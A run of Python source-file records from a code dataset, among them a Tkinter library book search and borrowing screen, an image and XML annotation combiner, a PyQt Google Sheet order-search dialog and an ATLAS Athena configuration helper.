stretch=True)\r\n\r\n # Bind event handlers\r\n # single click, without \"index out of range\" error\r\n tv.bind(\"<>\", self.on_tree_select)\r\n\r\n ## Scrollbar for Treeview ##\r\n tvScroll = ttk.Scrollbar(frm_results, \r\n orient=\"vertical\", command=tv.yview)\r\n tv.configure(yscrollcommand=tvScroll.set)\r\n tvScroll.pack(side=\"right\", fill='y')\r\n\r\n # Assign treeview\r\n self.treeview1 = tv\r\n\r\n # Add to layout\r\n frm_results.grid(row=1, column=0, padx=HOME_CONTENT_PADX, sticky=\"nsew\")\r\n\r\n\r\n #### Master container for Book Display ####\r\n frm_bottom = tk.Frame(master=frm_content, height=150, \r\n bg=\"white\",borderwidth=1,relief=tk.GROOVE)\r\n frm_bottom.grid(row=2, column=0, padx=HOME_CONTENT_PADX,\r\n pady=(10, 0), sticky=\"nsew\")\r\n frm_bottom.rowconfigure(0,weight=1)\r\n frm_bottom.columnconfigure(0,weight=1)\r\n\r\n #### Book Display ####\r\n frm_bkdispl = tk.Frame(master=frm_bottom,bg=\"white\")\r\n frm_bkdispl.grid(row=0,column=0,padx=10,sticky=\"nsew\")\r\n frm_bkdispl.grid_remove()\r\n self.frm_bkdip = frm_bkdispl\r\n \r\n ### Picture Display ###\r\n self.cnv_picture = tk.Canvas(frm_bkdispl, width = 120, height = 120,bg=\"white\")\r\n self.cnv_picture.pack(side=tk.LEFT,padx=(0,5))\r\n\r\n #### Book Details ###\r\n frm_bkdetails = tk.Frame(master=frm_bkdispl,bg=\"white\",height=100,width=200)\r\n frm_bkdetails.pack(side=tk.LEFT,fill=tk.BOTH,expand=True,padx=(0,15),pady=10)\r\n # Title #\r\n lbl_bk_d_title = tk.Label(master=frm_bkdetails, textvariable=self.bk_title,\r\n font=('',10,'bold'),bg=\"white\")\r\n lbl_bk_d_title.pack(anchor=\"w\")\r\n # Author #\r\n lbl_bk_d_author = tk.Label(master=frm_bkdetails, textvariable=self.bk_author,\r\n font=('',10,'italic'),bg=\"white\")\r\n lbl_bk_d_author.pack(anchor=\"w\")\r\n # Desc #\r\n lbl_bk_d_desc = tk.Label(master=frm_bkdetails, textvariable=self.bk_desc, \r\n justify=\"left\",bg=\"white\",anchor=\"nw\",\r\n height=5,width=50,wraplength=300,\r\n font=('',8))\r\n lbl_bk_d_desc.pack(anchor=\"nw\",expand=True,fill=tk.Y)\r\n\r\n ### Buttons ###\r\n frm_bk_btns = tk.Frame(master=frm_bkdispl, bg=\"white\")\r\n frm_bk_btns.pack(side=tk.LEFT,anchor=\"n\",pady=20,expand=False)\r\n \r\n frm_bk_btns.rowconfigure(0,weight=1)\r\n frm_bk_btns.rowconfigure(1,weight=1)\r\n frm_bk_btns.columnconfigure(0,weight=1)\r\n \r\n # Button Associated Message display #\r\n self.lbl_action_display = tk.Label(master=frm_bk_btns,text=\"\",\r\n width=12, \r\n font=('',10,'italic'),bg=\"white\")\r\n self.lbl_action_display.grid(row=0,column=0,pady=(0,5))\r\n \r\n # Borrow Button #\r\n self.btn_borrow = tk.Button(master=frm_bk_btns, text=\"Borrow\", \r\n height=2, padx=20, fg=\"White\", bg=\"DarkGreen\",\r\n state=tk.DISABLED, \r\n command=self.on_borrow_btn_press)\r\n self.btn_borrow.grid(row=1, column=0)\r\n \r\n # # Extend Button #\r\n # self.btn_extend = tk.Button(master=frm_bk_btns, text=\"Extend\", \r\n # height=2, padx=20, fg=\"White\", bg=\"LightBlue\",\r\n # state=tk.DISABLED, \r\n # command=self.on_extend_btn_press)\r\n # self.btn_extend.grid(row=1, column=0)\r\n # self.btn_extend.grid_remove()\r\n \r\n # Reserve Button #\r\n self.btn_reserve = tk.Button(master=frm_bk_btns, text=\"Reserve\", \r\n height=2, padx=20, fg=\"White\", bg=\"DarkGoldenRod\",\r\n state=tk.DISABLED,\r\n command=self.on_reserve_btn_press)\r\n self.btn_reserve.grid(row=1, column=0)\r\n self.btn_reserve.grid_remove()\r\n \r\n # Cancel Button #\r\n # self.btn_cancel = tk.Button(master=frm_bk_btns, text=\"Cancel\", \r\n # height=2, padx=20, fg=\"White\", bg=\"LightCoral\",\r\n # state=tk.DISABLED,\r\n # command=self.on_cancel_btn_press)\r\n # self.btn_cancel.grid(row=1, column=0)\r\n # self.btn_cancel.grid_remove()\r\n \r\n \r\n ### UI EVENT HANDLERS ###\r\n def getUpdateData(self, event):\r\n sub_vals = options[self.drop.get()]\r\n sub_disp = self.sub_drop.winfo_ismapped()\r\n \r\n if sub_vals == []: #no sub values \r\n if sub_disp:\r\n self.sub_drop.pack_forget()\r\n return \r\n if (not sub_disp):\r\n self.sub_drop.pack(side=tk.LEFT, fill=tk.Y,padx=(10,0))\r\n \r\n self.sub_drop['values'] = sub_vals\r\n\r\n def on_search_req_btn_press(self):\r\n if (not self.check_search_input()):\r\n return\r\n # Inputs valid:\r\n self.load_table1()\r\n\r\n def load_table1(self):\r\n search_df = self.search() #pandas df\r\n #Clear Treeview\r\n self.treeview1.delete(*self.treeview1.get_children())\r\n # Handle results\r\n if search_df.empty:\r\n self.lbl_msg_display.config(text=\"No results found\", fg=\"red\")\r\n if self.frm_bkdip.winfo_ismapped():\r\n self.frm_bkdip.grid_remove()\r\n else:\r\n self.search_results = search_df\r\n for index, row in search_df.iterrows():\r\n self.treeview1.insert('', 'end', values=(\r\n index, row[0], row[1], row[2]))\r\n\r\n def on_tree_select(self, event): \r\n item = self.treeview1.selection()[0]\r\n vals = self.treeview1.item(item, 'values')\r\n bk_id = int(vals[0])\r\n oVals = self.search_results.loc[bk_id,:]\r\n \r\n #Show book details frame (if hidden)\r\n if not self.frm_bkdip.winfo_ismapped():\r\n self.frm_bkdip.grid()\r\n #Update the book details frame\r\n self.load_book_thumb(bk_id,oVals[6])\r\n self.bk_title.set(vals[1])\r\n self.bk_author.set(oVals[4])\r\n self.bk_desc.set(oVals[5])\r\n #Update selection cursor\r\n self.bk_selected_id = bk_id\r\n self.bk_selected_title = vals[1]\r\n if not oVals[3] == \"NIL\":\r\n self.bk_selected_due = oVals[3].strftime(\"%d/%m/%Y\")\r\n print(self.bk_selected_due)\r\n #Update Buttons\r\n self.switch_button_states((vals[2],vals[3]))\r\n \r\n def load_book_thumb(self,book_id,url):\r\n self.cnv_picture.delete(\"all\")\r\n has_picture = False\r\n if url[:20] == \"https://s3.amazonaws\" :\r\n if book_id not in self.photos:\r\n print(\"Loading url...\")\r\n ## Load form URL\r\n # open the web page picture and read it into a memory stream\r\n # and convert to an image Tkinter can handle\r\n try: \r\n my_page = urlopen(url)\r\n # create an image file object\r\n my_picture = io.BytesIO(my_page.read())\r\n # use PIL to open image formats like .jpg .png .gif etc.\r\n pil_img = Image.open(my_picture)\r\n pil_img = pil_img.resize((125,125))\r\n # convert to an image Tkinter can use\r\n self.photos[book_id] = ImageTk.PhotoImage(pil_img)\r\n self.cnv_picture.create_image(60, 60, image=self.photos[book_id], anchor=tk.CENTER)\r\n has_picture = True\r\n except Exception as e: \r\n print(e)\r\n else: \r\n self.cnv_picture.create_image(60, 60, image=self.photos[book_id], anchor=tk.CENTER)\r\n\r\n if not has_picture:\r\n self.cnv_picture.create_text(60,60,font=\"Times 8 italic bold\",anchor=tk.CENTER,\r\n text=\"No Thumbnail available\")\r\n \r\n \r\n def switch_button_states(self,status):\r\n if self.user_unpaid_fines:\r\n return \r\n \r\n #By default, extend and cancel buttons are hidden\r\n if not self.btn_borrow.winfo_ismapped():\r\n self.btn_borrow.grid()\r\n if self.btn_reserve.winfo_ismapped():\r\n self.btn_reserve.grid_remove()\r\n self.lbl_action_display.grid_configure(pady=(0,5))\r\n \r\n #Status[0]: Available, On Loan \r\n #Status[1]: Reserved, Not Reserved \r\n if status[0] == \"Available\":\r\n #Can Borrow \r\n s = tk.NORMAL if len(self.user_borrowed) < 4 else tk.DISABLED\r\n self.btn_borrow.config(state=s)\r\n self.lbl_action_display.config(text=\"Available\\nfor borrowing\")\r\n else:\r\n #Cannot Borrow \r\n self.btn_borrow.config(tk.DISABLED)\r\n self.btn_borrow.grid_remove()\r\n #Check whether the book is borrowed by the current user\r\n print(self.bk_selected_id,\"|\",self.bk_selected_title)\r\n if self.bk_selected_id in self.user_borrowed:\r\n # #Borrowed by user -> can extend\r\n # self.btn_extend.config(state=tk.NORMAL)\r\n # self.btn_extend.grid()\r\n msg = \"You have\\nborrowed\\nthis item.\\nDue Date:\\n\" + self.bk_selected_due\r\n self.lbl_action_display.config(text= msg)\r\n else:\r\n #Not borrowed by user\r\n #Check whether has been reserved\r\n if status[1] == \"Not Reserved\":\r\n #Can Reserve \r\n self.btn_reserve.config(state=tk.NORMAL)\r\n self.btn_reserve.grid()\r\n msg = \"Available after\\n\" + self.bk_selected_due\r\n self.lbl_action_display.config(text= msg)\r\n\r\n elif status[1] == \"Reserved\":\r\n #Cannot Reserve\r\n #Check whether the book is reserved by the current user\r\n if self.bk_selected_id in self.user_reserved:\r\n #Reserved by user -> can cancel;\r\n # self.btn_cancel.config(state=tk.NORMAL)\r\n # self.btn_cancel.grid()\r\n self.lbl_action_display.config(text=\"You have\\nreserved\\nthis item\")\r\n else:\r\n self.lbl_action_display.config(text=\"Item \\nhas been\\nreserved\\nby another\\nuser\") \r\n \r\n def on_borrow_btn_press(self):\r\n print(self.user_name,\" clicks borrows \",self.bk_selected_id)\r\n borrow_status = bkborrow.borrow_book(self.bk_selected_id,self.user_name)\r\n if borrow_status == \"Borrowing succeeded\": #Everything Ok\r\n print(\"Borrow Ok\")\r\n self.user_borrowed.append(self.bk_selected_id)\r\n #Show borrow confirmation prompt\r\n msg = \"You have borrowed \" + self.bk_selected_title\r\n d1 = (datetime.today() + timedelta(days=28)).strftime(\"%d/%m/%Y\")\r\n msg += \"\\n Due date is \" + d1\r\n tk.messagebox.showinfo(\"Borrow Book\",msg)\r\n #Update selection date\r\n self.bk_selected_due = d1\r\n #Refresh the ui\r\n self.update_local_tree(\"borrow\")\r\n else:\r\n print(\"An error occured:\")\r\n print(borrow_status)\r\n #Update buttons states\r\n self.switch_button_states((\"On Loan\",\"Not Reserved\"))\r\n \r\n def on_reserve_btn_press(self):\r\n #print(self.user_name,\" clicks borrows \",self.bk_selected_id)\r\n reserve_status = bkborrow.reserve_book(self.bk_selected_id,self.user_name)\r\n if reserve_status == \"Book reserved\":\r\n print(\"Reserve Ok\")\r\n #Show reserve confirmation prompt\r\n self.user_reserved.append(self.bk_selected_id)\r\n msg = \"You have reserved \" + self.bk_selected_title\r\n tk.messagebox.showinfo(\"Borrow Book\",msg)\r\n #Refresh the ui\r\n self.update_local_tree(\"reserve\")\r\n else:\r\n print(\"An error occured:\")\r\n print(reserve_status)\r\n #Update buttons states\r\n self.switch_button_states((\"Not Available\",\"Reserved\"))\r\n \r\n \r\n def update_local_tree(self,action):\r\n selected = self.treeview1.focus()\r\n old_vals = self.treeview1.item(selected,\"values\")\r\n if action == \"borrow\":\r\n new_vals = (old_vals[0],old_vals[1],\"Not Available\",old_vals[3])\r\n elif action == \"reserve\":\r\n new_vals = (old_vals[0],old_vals[1],old_vals[2],\"Reserved\")\r\n else:\r\n new_vals = old_vals\r\n print(\"ERROR: invalid action\")\r\n \r\n self.treeview1.item(selected,text=\"\",values=new_vals)\r\n\r\n ### HELPER FUNCTIONS ###\r\n\r\n def check_search_input(self):\r\n valid_input = False\r\n # Check search field\r\n if self.search_text.get() == \"\" and self.drop.get() != \"Categories\":\r\n self.lbl_msg_display.config(text=\"Fill in Search Request\", fg=\"red\")\r\n else:\r\n self.lbl_msg_display.config(text=\"\", fg=\"green\")\r\n valid_input = True\r\n return valid_input\r\n\r\n def search(self):\r\n search_words = self.search_text.get()\r\n filt = self.drop.get()\r\n if search_words != \"\" or filt == \"Categories\":\r\n \r\n if filt == \"Title\":\r\n simple_search_dict = bksearch.simple_search(search_words)\r\n return bksearch.similarity_sort(simple_search_dict, search_words, \"title\")\r\n else:\r\n if filt == \"ISBN\" or filt == \"Categories\" or filt == \"Authors\":\r\n #print(self.drop.get())\r\n #print(self.sub_drop.get())\r\n advance_search_dict = bksearch.advance_search(search_words, filt.lower())\r\n return bksearch.similarity_sort(advance_search_dict, search_words, filt.lower())\r\n else:\r\n filt = filt.replace(\" \", \"\")\r\n secondary_filt = self.sub_drop.get()\r\n #print(self.drop.get())\r\n #print(self.sub_drop.get())\r\n #print(bksearch.advance_search(int(search_words),filt.lower(), secondary_filt.lower()))\r\n return bksearch.advance_search(int(search_words), filt.lower(), secondary_filt.lower())\r\n else:\r\n return pd.DataFrame()\r\n\r\n\r\n## DEBUG USE ONLY ###\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n root.geometry('600x600')\r\n root.minsize(600, 600)\r\n container = tk.Frame(root)\r\n container.pack(side=\"top\", fill=\"both\", expand=True)\r\n container.grid_rowconfigure(0, weight=1)\r\n container.grid_columnconfigure(0, weight=1)\r\n \r\n test_user = {\"userId\": \"henrychia07\",\r\n \"unpaid_fines\": False,\r\n \"borrowed\": [79,308],\r\n \"reserved\": []\r\n }\r\n \r\n frame = SearchDisplay(container,root,test_user)\r\n frame.grid(row=0, column=0, sticky=\"nsew\")\r\n frame.tkraise()\r\n \r\n root.mainloop()","sub_path":"Frontend/page_searchdisplay.py","file_name":"page_searchdisplay.py","file_ext":"py","file_size_in_byte":21687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44607366","text":"def compare(a, b):\r\n if a[1] > b[1]:\r\n return True\r\n elif a[1] == b[1]:\r\n return a[0] > b[0]\r\n else:\r\n return False\r\n\r\ndef sort(f):\r\n for i in range(1, len(f)):\r\n tmp = f[i]\r\n j = i - 1\r\n while j >= 0 and compare(tmp, f[j]):\r\n f[j + 1] = f[j]\r\n j -= 1\r\n f[j + 1] = tmp\r\n\r\nf = [[1,3], [2,7], [2,3], [4,4]]\r\nsort(f)\r\nprint(f)","sub_path":"модуль 2. задание 2.py","file_name":"модуль 2. задание 2.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"431472418","text":"import os\nfrom lxml import etree\nimport cv2\nimport numpy as np\nimport random\nimport glob\nimport argparse\nfrom utils import get_bboxes, draw_rect, remove_contents_in_dir\n\n\ndef get_sysargs():\n parser = argparse.ArgumentParser(description='Scrape Google images')\n parser.add_argument('-d1', '--dir1', type=str, help='dataset directory')\n parser.add_argument('-d2', '--dir2', type=str, help='dataset directory')\n return parser.parse_args()\n\n\ndef combine_xml(xml_path1, xml_path2, xml_combined_path, img_size, shift1, shift2):\n parser1 = etree.XMLParser(remove_blank_text=True)\n parser2 = etree.XMLParser(remove_blank_text=True)\n tree1 = etree.parse(xml_path1, parser1)\n root1 = tree1.getroot()\n tree2 = etree.parse(xml_path2, parser2)\n root2 = tree2.getroot()\n\n\n bbox_keys = ('xmin', 'ymin', 'xmax', 'ymax')\n bbox1 = tuple(map(lambda key: int(root1.find('object').find('bndbox').find(key).text), bbox_keys))\n bbox2 = tuple(map(lambda key: int(root2.find('object').find('bndbox').find(key).text), bbox_keys))\n bbox1 = shift_bbox(bbox1, shift1)\n bbox2 = shift_bbox(bbox2, shift2)\n\n size_keys = ('height', 'width')\n for key, val in zip(size_keys, img_size):\n root1.find('size').find(key).text = str(val)\n\n for key, val in zip(bbox_keys, bbox1):\n root1.find('object').find('bndbox').find(key).text = str(int(val))\n for key, val in zip(bbox_keys, bbox2):\n root2.find('object').find('bndbox').find(key).text = str(int(val))\n\n root1.find('src').text = '-'\n root1.find('object').addnext(root2.find('object'))\n xml_str = etree.tostring(root1, pretty_print=True)\n with open(xml_combined_path, 'wb') as f_xml:\n f_xml.write(xml_str)\n\n return (bbox1, bbox2)\n\n\ndef shift_bbox(bbox, shift):\n return bbox[0] + shift, bbox[1], bbox[2] + shift, bbox[3]\n\n\ndef combine_img(img_path1, img_path2, save_path):\n img1 = cv2.imread(img_path1)\n img2 = cv2.imread(img_path2)\n h1, w1 = img1.shape[:2]\n h2, w2 = img2.shape[:2]\n\n if random.uniform(0, 1) <= 0.5:\n img_combined = np.concatenate((img1, img2), axis=1)\n shift1 = 0\n shift2 = w1\n else:\n img_combined = np.concatenate((img2, img1), axis=1)\n shift1 = w2\n shift2 = 0\n\n cv2.imwrite(save_path, img_combined)\n return img_combined.shape[:2], shift1, shift2\n\n\ndef main():\n sysargs = get_sysargs()\n root_dir1 = sysargs.dir1\n root_dir2 = sysargs.dir2\n\n img_resized_dir1 = os.path.join(root_dir1, 'img_resized')\n xml_resized_dir1 = os.path.join(root_dir1, 'xml_resized')\n img_resized_dir2 = os.path.join(root_dir2, 'img_resized')\n xml_resized_dir2 = os.path.join(root_dir2, 'xml_resized')\n img_combined_dir = os.path.join(root_dir1, 'img_combined')\n xml_combined_dir = os.path.join(root_dir1, 'xml_combined')\n ensure_dir = os.path.join(root_dir1, 'ensure_combine')\n\n for dir_path in [img_combined_dir, xml_combined_dir, ensure_dir]:\n if os.path.exists(dir_path):\n remove_contents_in_dir(dir_path)\n else:\n os.mkdir(dir_path)\n\n img_resized2 = [x for x in glob.glob(img_resized_dir2 + os.sep + '*')]\n random.shuffle(img_resized2)\n\n for img_name in os.listdir(img_resized_dir1):\n img_path1 = os.path.join(img_resized_dir1, img_name)\n img_root1, img_ext1 = os.path.splitext(img_name)\n xml_path1 = os.path.join(xml_resized_dir1, img_root1 + '.xml')\n img_path2 = img_resized2.pop()\n xml_path2 = os.path.join(\n xml_resized_dir2,\n os.path.splitext(os.path.basename(img_path2))[0] + '.xml'\n )\n\n img_combined_path = os.path.join(img_combined_dir, img_name)\n xml_combined_path = os.path.join(xml_combined_dir, img_root1 + '.xml')\n img_size, shift1, shift2 = combine_img(img_path1, img_path2, img_combined_path)\n bboxes = combine_xml(xml_path1, xml_path2, xml_combined_path, img_size, shift1, shift2)\n img_ensure_path = os.path.join(ensure_dir, img_name)\n bboxes, names = get_bboxes(xml_combined_path)\n draw_rect(img_combined_path, img_ensure_path, bboxes, names)\n print(img_combined_path)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"combine_img.py","file_name":"combine_img.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"372039268","text":"from pyramid_template_matcher import PyramidTemplateMatcher\nfrom cv2img import CV2Img\n\ndef test_pyramid_template_matcher():\n source = CV2Img()\n source.load_file(\"./screen.png\")\n\n target = CV2Img()\n target.load_file(\"./gmail.png\")\n\n ratio = min(target.rows / 12, target.cols / 12)\n\n matcher = PyramidTemplateMatcher(source, target, 1, ratio)\n for i in range(0, 20):\n result = matcher.next()\n print(result)\n","sub_path":"test/test_pyramid_template_matcher.py","file_name":"test_pyramid_template_matcher.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"629958375","text":"from unittest.mock import Mock, patch\n\nfrom preference_data.query_generation.segment.segment_sampler import AbstractSegmentSampler\nfrom preference_data.query_generation.segment.segment_sampling_callback import SegmentSamplingCallback\n\n\n@patch.multiple(AbstractSegmentSampler, __abstractmethods__=set())\ndef test_samples_trajectory_segment_every_sampling_interval(policy_model):\n sample_mock = Mock()\n interval = 10\n\n segment_sampler = AbstractSegmentSampler(segment_samples=[],\n trajectory_buffer=policy_model.env.envs[0].trajectory_buffer)\n segment_sampler.try_to_sample = sample_mock\n\n callback = SegmentSamplingCallback(segment_sampler=segment_sampler, sampling_interval=interval,\n generation_volume=10)\n\n policy_model.learn(total_timesteps=interval, callback=callback)\n\n sample_mock.assert_called_once()\n","sub_path":"tests/preference_data/generation/test_segment_sampling_callback.py","file_name":"test_segment_sampling_callback.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"114009756","text":"from os import system\nfrom colorama import init\nfrom termcolor import colored\nfrom models import contact\n\ninit()\n\ndef Print_Menu() :\n\tsystem(\"cls\")\n\tcontact.print_judul()\n\tprint(colored(\"Welcome\",\"white\"), colored('username','yellow'))\n\n\tMenu = \"\"\"\n[A]. Tambah Barang Baru\n[B]. Lihat Seluruh Barang\n[C]. Cari Barang\n[D]. Hapus Barang\n[E]. Edit Informasi Barang\n[F]. Tambah Stok Barang\t\n[G]. Kurang Stok Barang\n\n[U]. Tambah, Hapus, dan Edit\n Username dan Password\n\n[O]. Tentang Aplikasi\n[Q]. Keluar Aplikasi\n\"\"\"\n\tprint(Menu)\n\ndef Print_Menu_2() :\n\tsystem(\"cls\")\n\tcontact.print_judul()\n\tMenu = \"\"\"\n[A]. Tambah User\n[B]. Lihat Seluruh User\n[C]. Hapus User\n\n[Q]. Kembali ke MENU\n\t\"\"\"\n\tprint(Menu)\n\ndef tentang_aplikasi() :\n\tsystem(\"cls\")\n\tcontact.print_judul()\n\tprint(colored(\">> \",\"green\"),colored(\"Version : 2.0\",\"yellow\"))\n\tprint(colored(\">> \",\"green\"),colored(\"Creator : Vergeo Valentino Gunawan (9.A)\",\"yellow\"))\n\tcontact.print_continue()","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"557648108","text":"# dlg_find.py\n\nfrom credentials import google_sheet, main_sheet_first_row\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nimport PyQt5.QtWidgets as QtWidgets\nimport sys\nfrom PyQt5 import uic\nimport numpy as np\nimport time, datetime\n\n\nclass find_dlg(QDialog):\n\n def __init__(self):\n QDialog.__init__(self)\n self.ui = uic.loadUi(\"setting/dialog_find.ui\", self)\n self.ui.show()\n self.find_order_state.clicked.connect(self.order_state_append_btn_click)\n self.find_one_hundred.clicked.connect(self.find_one_hundred_btn_click)\n self.all_find_btn.clicked.connect(self.all_find_btn_click)\n self.treeWidget.setColumnWidth(0, 110)\n\n self.treeWidget.itemDoubleClicked.connect(self.win_append)\n self.normal_shutdown_token = False\n self.editor = \"\"\n\n def find_header(self):\n headerItem = self.treeWidget.headerItem()\n num_of_column = headerItem.columnCount()\n\n header = []\n for i in range(num_of_column):\n x = headerItem.text(i)\n header.append(x)\n\n return header\n\n def make_index_list(self):\n header_list = self.find_header()\n\n index_list = [main_sheet_first_row.index(x) for x in header_list \\\n if x in main_sheet_first_row] # header 오류 나면 안됨.\n return index_list\n\n def make_wanted_range_cells(self, num_of_find = 10000):\n\n try: last_index = len(google_sheet.ms.col_values(1))\n except Exception as ex:\n google_sheet.refresh_data();\n last_index = len(google_sheet.ms.col_values(1))\n first_index = last_index - num_of_find\n if first_index < 2: first_index = 2\n col_index = len(main_sheet_first_row)\n\n try:\n wanted_range_cells = google_sheet.ms.range(first_index, 1, \\\n last_index, col_index)\n except Exception as ex:\n google_sheet.refresh_data()\n wanted_range_cells = google_sheet.ms.range(first_index, 1, \\\n last_index, col_index)\n\n num_of_model = int(len(wanted_range_cells) / col_index)\n wanted_range_cells = [wanted_range_cells[i * col_index: (i + 1) * col_index] for i in\n range(num_of_model)]\n\n return np.array(wanted_range_cells)\n\n def set_none(self):\n headerItem = self.treeWidget.headerItem()\n num_of_column = headerItem.columnCount()\n self.treeWidget.addTopLevelItem(QTreeWidgetItem(['없음'] + [\"\"] * (num_of_column - 1)))\n\n def order_state_append_btn_click(self):\n try:\n\n self.treeWidget.clear()\n\n index_list = self.make_index_list()\n wanted_value = self.order_state.currentText()\n order_state_index = main_sheet_first_row.index(\"주문 상태\")\n wanted_range_cells = self.make_wanted_range_cells()\n\n for cells in wanted_range_cells:\n if wanted_value == cells[order_state_index].value:\n wanted_cells = cells[index_list]\n list_for_treewidget = [x.value for x in wanted_cells]\n self.treeWidget.addTopLevelItem(QTreeWidgetItem(list_for_treewidget))\n continue\n\n if self.treeWidget.topLevelItemCount() == 0 :\n self.set_none()\n\n except Exception as ex:\n text = \"Error raise : \\n\" + str(ex)\n self.textEdit.setText(text)\n\n def all_find_btn_click(self):\n try:\n self.treeWidget.clear()\n index_list = self.make_index_list()\n wanted_value = self.all_text.text()\n\n if not wanted_value.replace(\" \", \"\") : return 0\n wanted_range_cells = self.make_wanted_range_cells()\n\n for cells in wanted_range_cells:\n for cell in cells:\n if wanted_value.replace(\"-\", \"\").replace(\" \", \"\") \\\n in cell.value.replace(\"-\", \"\").replace(\" \", \"\") :\n wanted_cells = cells[index_list]\n list_for_treewidget = [x.value for x in wanted_cells]\n self.treeWidget.addTopLevelItem(QTreeWidgetItem(list_for_treewidget))\n break\n\n if self.treeWidget.topLevelItemCount() == 0 :\n self.set_none()\n\n except Exception as ex:\n text = \"Error raise \\n\" + str(ex)\n self.textEdit.setText(text)\n\n def find_one_hundred_btn_click(self):\n try:\n self.treeWidget.clear()\n\n index_list = self.make_index_list()\n wanted_range_cells = self.make_wanted_range_cells(num_of_find=100)\n\n for cells in wanted_range_cells:\n wanted_cells = cells[index_list]\n list_for_treewidget = [x.value for x in wanted_cells]\n self.treeWidget.addTopLevelItem(QTreeWidgetItem(list_for_treewidget))\n\n if self.treeWidget.topLevelItemCount() == 0 :\n self.set_none()\n\n except Exception as ex:\n text = \"Error raise : \\n\" + str(ex)\n self.textEdit.setText(text)\n\n\n def win_append(self):\n try:\n time_stamp = self.treeWidget.currentItem().text(0)\n time_stamp_index = main_sheet_first_row.index(\"타임스탬프\")\n\n try:\n time_stamp_list = google_sheet.ms.col_values(col=time_stamp_index + 1, \\\n value_render_option='FORMATTED_VALUE')\n except:\n google_sheet.refresh_data()\n time_stamp_list = google_sheet.ms.col_values(col=time_stamp_index + 1, \\\n value_render_option='FORMATTED_VALUE')\n\n if not time_stamp in time_stamp_list:\n raise Exception(\"No matching information\")\n\n index = time_stamp_list.index(time_stamp)\n g_range = google_sheet.ms.range(index + 1, 1, index + 1, len(main_sheet_first_row))\n\n self.customer_info = {}\n for cell, name in zip(g_range, main_sheet_first_row):\n self.customer_info[name] = cell.value\n\n\n # last access\n time_stamp = datetime.datetime.now().strftime('%m. %d %p %I:%M:%S')\n time_stamp = time_stamp.replace(\"PM\", \"오후\").replace(\"AM\", \"오전\")\n text = self.editor + \"__({})\".format(time_stamp)\n google_sheet.ms.update_cell(index + 1, main_sheet_first_row.index(\"last_access\") + 1, text )\n\n print(\"main sheet load complete\")\n self.normal_shutdown_token = True\n self.close()\n\n except Exception as ex:\n text = \"Error raise \\n\" + str(ex)\n self.textEdit.setText(text)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = find_dlg()\n myWindow.show()\n app.exec_()","sub_path":"dlg_find.py","file_name":"dlg_find.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"411236349","text":"# Copyright (C) 2002-2019 CERN for the benefit of the ATLAS collaboration\nfrom __future__ import print_function\nfrom AthenaCommon.Logging import logging\nfrom AthenaCommon.CFElements import isSequence\nfrom AthenaCommon.Configurable import ConfigurableAlgTool\nfrom GaudiKernel.GaudiHandles import PrivateToolHandle, PrivateToolHandleArray\nimport six\n\nmsg = logging.getLogger('PropSetterProxy')\n\nclass PropSetterProxy(object):\n __compPaths = {}\n __scannedCA = None\n\n def __init__(self, ca, path): \n self.__path = path \n self.__findComponents( ca )\n \n def __setattr__(self, name, value):\n if name.startswith(\"_PropSetterProxy\"):\n return super(PropSetterProxy, self).__setattr__(name, value)\n\n if name != \"OutputLevel\":\n msg.warning( \"Only OutputLevel is allowed to be changed with the foreach_component at the moment\" )\n return\n\n \n import fnmatch\n for component_path, component in six.iteritems(PropSetterProxy.__compPaths):\n if fnmatch.fnmatch( component_path, self.__path ):\n if name in component._descriptors:\n try:\n setattr( component, name, value )\n msg.info( \"Set property: %s to value %s of component %s because it matched %s \",\n name, str(value), component_path, self.__path )\n except Exception as ex:\n msg.warning( \"Failed to set property: %s to value %s of component %s because it matched %s, reason: %s\",\n name, str(value), component_path, self.__path, str(ex) )\n pass\n else:\n msg.warning( \"No such property: %s in component %s, tried to set it because it matched %s\",\n name, component_path, self.__path )\n\n\n def __findComponents(self, ca):\n if ca is not PropSetterProxy.__scannedCA:\n PropSetterProxy.__scannedCA = ca\n PropSetterProxy.__compPaths = {}\n def __add(path, comp):\n if comp.getName() == \"\":\n return\n PropSetterProxy.__compPaths[ path ] = comp\n\n\n for svc in ca._services:\n PropSetterProxy.__compPaths['SvcMgr/'+svc.getFullJobOptName()] = svc\n for t in ca._publicTools:\n PropSetterProxy.__compPaths['ToolSvc/'+t.getFullJobOptName()] = t\n \n def __nestAlg(startpath, comp): # it actually dives inside the algorithms and (sub) tools \n if comp.getName() == \"\":\n return\n for name, value in six.iteritems(comp._descriptors):\n if isinstance( value.cpp_type, ConfigurableAlgTool ) or isinstance( value.cpp_type, PrivateToolHandle ):\n __add( startpath+\"/\"+name+\"/\"+value.getFullJobOptName(), value )\n __nestAlg( startpath+\"/\"+name+\"/\"+value.getName(), value )\n if isinstance( value.cpp_type, PrivateToolHandleArray):\n for toolIndex,t in enumerate(value):\n __add( startpath+\"/\"+name+\"/\"+t.getFullJobOptName(), t )\n __nestAlg( startpath+\"/\"+name+\"/\"+t.getName(), value[toolIndex] )\n \n \n def __nestSeq( startpath, seq ):\n for c in seq.Members:\n if isSequence(c):\n __nestSeq( startpath+\"/\"+c.getName(), c ) \n else: # the algorithm or tool\n __add( startpath+\"/\"+c.getFullJobOptName(), c )\n __nestAlg( startpath+\"/\"+c.getFullJobOptName(), c )\n\n __nestSeq(\"\", ca._sequence)\n \n 